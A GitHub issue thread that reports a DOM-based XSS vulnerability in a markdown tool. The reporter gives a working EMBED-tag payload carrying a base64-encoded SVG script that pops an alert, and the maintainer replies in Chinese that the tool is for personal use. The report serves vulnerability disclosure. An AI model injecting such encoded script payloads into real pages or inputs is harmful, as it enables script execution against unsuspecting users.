### ISSUE TITLE
XSS vulnerability in <EMBED> label,SVG include attack vector. 

### ISSUE THREAD

**Issue by 0xzmz** [phodal/md#20]
This label and attack vector will cause dom-based XSS.
if you type
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhhYVMiKTs8L3NjcmlwdD48L3N2Zz4=" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`，the xss vulnerability will be triggered.
![xss](https://user-images.githubusercontent.com/18528656/60485400-6f3ddf80-9ccf-11e9-973c-2b23550a3da1.png)

**Comment by phodal** [comment]
这个是我自己用在微信公众号上的，我自己不会有这种需求。
